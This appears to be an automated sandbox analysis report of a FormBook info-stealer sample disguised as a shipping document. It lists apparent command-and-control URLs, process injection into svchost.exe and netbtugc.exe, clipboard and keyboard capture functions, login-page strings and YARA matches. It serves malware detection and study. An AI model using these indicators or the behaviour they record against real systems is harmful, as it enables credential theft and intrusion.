Data Ascii: 3vHty=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uzgpnNptQY+3vyP+3wAh6DxEpmZai6+Sog==

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 16 Sep 2024 12:10:11 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 16 Sep 2024 12:10:14 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 16 Sep 2024 12:10:19 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Source: tfTpvPSAdwQ.exe, 00000007.00000002.3125347091.0000000004BB3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.tigre777gg.online
Source: tfTpvPSAdwQ.exe, 00000007.00000002.3125347091.0000000004BB3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.tigre777gg.online/06rp/
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000006.00000002.3123044826.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000006.00000002.3123044826.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000006.00000002.3123044826.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000006.00000002.3123044826.00000000007E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000006.00000002.3123044826.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000006.00000002.3123044826.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000006.00000003.2579154076.0000000007282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000006.00000002.3124808735.0000000003A38000.00000004.10000000.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3124031498.0000000002E38000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.masteriocp.online/p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_0010EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0010EAFF

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_0010ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0010ED6A

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

0_2_0010EAFF

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000FAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_000FAA57

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_00129576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00129576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.430000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.430000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.430000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Shipping report#Cargo Handling.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Shipping report#Cargo Handling.exe, 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_599f1d05-e
Source: Shipping report#Cargo Handling.exe, 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d13543b5-d
Source: Shipping report#Cargo Handling.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7a443f7f-2
Source: Shipping report#Cargo Handling.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0e235de5-0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0045C4F3 NtClose,	1_2_0045C4F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B60 NtClose,LdrInitializeThunk,	1_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,	1_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074340 NtSetContextThread,	1_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074650 NtSuspendThread,	1_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B80 NtQueryInformationFile,	1_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BA0 NtEnumerateValueKey,	1_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BE0 NtQueryValueKey,	1_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BF0 NtAllocateVirtualMemory,	1_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AB0 NtWaitForSingleObject,	1_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AD0 NtReadFile,	1_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AF0 NtWriteFile,	1_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F30 NtCreateSection,	1_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F60 NtCreateProcessEx,	1_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F90 NtProtectVirtualMemory,	1_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FA0 NtQuerySection,	1_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FB0 NtResumeThread,	1_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FE0 NtCreateFile,	1_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E30 NtWriteVirtualMemory,	1_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E80 NtReadVirtualMemory,	1_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EA0 NtAdjustPrivilegesToken,	1_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EE0 NtQueueApcThread,	1_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D00 NtSetInformationFile,	1_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D10 NtMapViewOfSection,	1_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D30 NtUnmapViewOfSection,	1_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DB0 NtEnumerateKey,	1_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DD0 NtDelayExecution,	1_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C00 NtQueryInformationProcess,	1_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C60 NtCreateKey,	1_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CA0 NtQueryInformationToken,	1_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CC0 NtQueryVirtualMemory,	1_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CF0 NtOpenProcess,	1_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073010 NtOpenDirectoryObject,	1_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073090 NtSetValueKey,	1_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030739B0 NtGetContextThread,	1_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D10 NtOpenProcessToken,	1_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D70 NtOpenThread,	1_2_03073D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D74340 NtSetContextThread,LdrInitializeThunk,	6_2_02D74340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D74650 NtSuspendThread,LdrInitializeThunk,	6_2_02D74650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D735C0 NtCreateMutant,LdrInitializeThunk,	6_2_02D735C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72AD0 NtReadFile,LdrInitializeThunk,	6_2_02D72AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72AF0 NtWriteFile,LdrInitializeThunk,	6_2_02D72AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_02D72BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_02D72BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_02D72BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72B60 NtClose,LdrInitializeThunk,	6_2_02D72B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D739B0 NtGetContextThread,LdrInitializeThunk,	6_2_02D739B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_02D72EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_02D72E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72FE0 NtCreateFile,LdrInitializeThunk,	6_2_02D72FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72FB0 NtResumeThread,LdrInitializeThunk,	6_2_02D72FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72F30 NtCreateSection,LdrInitializeThunk,	6_2_02D72F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_02D72CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_02D72C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72C60 NtCreateKey,LdrInitializeThunk,	6_2_02D72C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72DD0 NtDelayExecution,LdrInitializeThunk,	6_2_02D72DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_02D72DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_02D72D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_02D72D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D73090 NtSetValueKey,	6_2_02D73090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D73010 NtOpenDirectoryObject,	6_2_02D73010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72AB0 NtWaitForSingleObject,	6_2_02D72AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72B80 NtQueryInformationFile,	6_2_02D72B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72EA0 NtAdjustPrivilegesToken,	6_2_02D72EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72E30 NtWriteVirtualMemory,	6_2_02D72E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72F90 NtProtectVirtualMemory,	6_2_02D72F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72FA0 NtQuerySection,	6_2_02D72FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72F60 NtCreateProcessEx,	6_2_02D72F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72CC0 NtQueryVirtualMemory,	6_2_02D72CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72CF0 NtOpenProcess,	6_2_02D72CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72C00 NtQueryInformationProcess,	6_2_02D72C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72DB0 NtEnumerateKey,	6_2_02D72DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D73D70 NtOpenThread,	6_2_02D73D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D73D10 NtOpenProcessToken,	6_2_02D73D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D72D00 NtSetInformationFile,	6_2_02D72D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00138B30 NtCreateFile,	6_2_00138B30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00138CA0 NtReadFile,	6_2_00138CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00138D90 NtDeleteFile,	6_2_00138D90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00138E40 NtClose,	6_2_00138E40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00138FB0 NtAllocateVirtualMemory,	6_2_00138FB0

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000FD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_000FD5EB

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_000F1201

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_000FE8F6

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00102046	0_2_00102046
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00098060	0_2_00098060
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000F8298	0_2_000F8298
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000CE4FF	0_2_000CE4FF
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000C676B	0_2_000C676B
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00124873	0_2_00124873
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000BCAA0	0_2_000BCAA0
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_0009CAF0	0_2_0009CAF0
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000ACC39	0_2_000ACC39
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000C6DD9	0_2_000C6DD9
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000AB119	0_2_000AB119
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000991C0	0_2_000991C0
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B1394	0_2_000B1394
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B1706	0_2_000B1706
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B781B	0_2_000B781B
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00097920	0_2_00097920
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000A997D	0_2_000A997D
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B19B0	0_2_000B19B0
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B7A4A	0_2_000B7A4A
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B1C77	0_2_000B1C77
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B7CA7	0_2_000B7CA7
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_0011BE44	0_2_0011BE44
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000C9EEE	0_2_000C9EEE
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B1F32	0_2_000B1F32
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_03528A68	0_2_03528A68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00448573	1_2_00448573
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00440033	1_2_00440033
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00433097	1_2_00433097
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004330A0	1_2_004330A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0043E0B3	1_2_0043E0B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00432A30	1_2_00432A30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0045EAD3	1_2_0045EAD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00433430	1_2_00433430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004324D0	1_2_004324D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0043FE13	1_2_0043FE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004326A0	1_2_004326A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0044674E	1_2_0044674E
